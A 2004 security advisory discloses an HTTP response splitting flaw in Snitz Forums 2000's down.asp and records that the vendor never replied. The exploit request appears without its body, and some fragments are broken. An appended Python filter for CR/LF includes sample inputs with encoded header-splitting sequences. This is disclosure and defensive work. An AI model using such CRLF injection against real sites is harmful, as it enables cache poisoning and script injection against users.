
Snitz forums security hole (HTTP response splitting)
ADVISORY: security hole (HTTP response splitting) in Snitz Forums 2000

Author: Maestro (me!)
Date: 16-SEP-04
Vendor: Snitz Communications ( 
Product: Snitz Forums 2000 v3.4.04

Product description: (from vendor website) "the leading ASP forum/bbs on the internet today"

Problem: HTTP response splitting (web cache poisoning, XSS, yadayadayada) - sponse.pdf

POST /down.asp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 134


(replace curly braces with less-than and greater-than signs)

Vendor status: vendor contacted several times (email to support@ and to the contact email in the code). No response from vendor.
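
With no vendor fix reported, one stopgap is to screen form bodies posted to the affected script for CR/LF before the application sees them. The sketch below is an added example, not part of the original advisory or of the Snitz code; the advisory does not name the affected parameter, so the field names (`file`, `id`, `message`), the sample bodies and the `multiline_ok` allowlist are constructed assumptions.

```python
from urllib.parse import parse_qsl, unquote

MAX_DECODE_ROUNDS = 3  # assumption: how many nested encodings to unwrap


def fully_decode(value, rounds=MAX_DECODE_ROUNDS):
    """Percent-decode repeatedly so double-encoded %250d%250a is also caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def crlf_fields(body, multiline_ok=()):
    """Return names of urlencoded form fields that carry CR or LF.

    multiline_ok lists fields (hypothetical, e.g. a post body) that may
    legitimately contain line breaks and never reach a response header.
    """
    flagged = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        name_d, value_d = fully_decode(name), fully_decode(value)
        if name_d in multiline_ok:
            continue
        if any(c in name_d + value_d for c in "\r\n"):
            # Escape before logging so the log line itself cannot be split.
            flagged.append(name_d.replace("\r", "\\r").replace("\n", "\\n"))
    return flagged


if __name__ == "__main__":
    # Constructed sample bodies, not taken from the advisory.
    samples = [
        "file=readme.txt&id=12",
        "file=a.txt%0d%0amarker",
        "file=a.txt%250D%250Amarker&id=1",
    ]
    for body in samples:
        print(body, "->", crlf_fields(body) or "clean")
```

Input screening of this kind is only a stopgap; the durable fix is for the application to reject CR and LF at the point where it writes a request-derived value into a response header.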
